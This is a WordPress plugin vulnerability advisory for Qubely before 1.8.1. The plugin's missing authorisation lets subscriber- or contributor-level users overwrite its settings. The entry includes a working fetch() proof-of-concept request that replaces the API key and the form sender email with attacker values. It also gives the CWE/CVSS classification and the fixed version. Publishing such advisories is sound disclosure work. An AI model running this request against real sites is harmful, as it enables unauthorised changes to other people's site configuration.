WordPress Plugin Vulnerabilities

Qubely < 1.8.1 - Authenticated Arbitrary Settings Update

Description

The plugin does not have proper authorisation when saving its settings, allowing users with a role as low as subscriber (in versions < 1.7.9) or contributor (in v < 1.8.1) to update them

Proof of Concept

As a subscriber (Nonce can be taken from the qubely_local_script-js-extra script on the homepage)

fetch("http://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action": "update_qubely_options", "options[qubely_gmap_api_key]": "attacker-key", "options[form_from_name]": "Attacker", "options[form_from_email]": "attacker@domain.com", "_wpnonce": "602dfb5e65"}),
  "method": "POST",
  "credentials": "include"
});

Affects Plugins

Plugin icon
qubely
Fixed in 1.8.1

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Jan w Oleju
Submitter
Jan w Oleju
Verified
Yes
WPVDB ID
a14fef22-a21b-4e37-b75f-d3153055a2f6

Timeline

Publicly Published
2022-06-06 (about 1 years ago)
Added
2022-06-06 (about 1 years ago)
Last Updated
2022-06-14 (about 1 years ago)

Other

Published
Title
Published
2023-01-10
Title
Royal Elementor Addons < 1.3.60 - Subscriber+ Arbitrary Plugin Activation
Published
2024-04-23
Title
Send PDF for Contact Form 7 < 1.0.2.4 - Missing Authorization
Published
2024-04-29
Title
Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy) < 5.2.4 - Missing Authorization
Published
2024-04-22
Title
Social Snap < 1.3.6 - Missing Authorization
Published
2023-07-18
Title
Easy Captcha <= 1.0 - Missing Authorization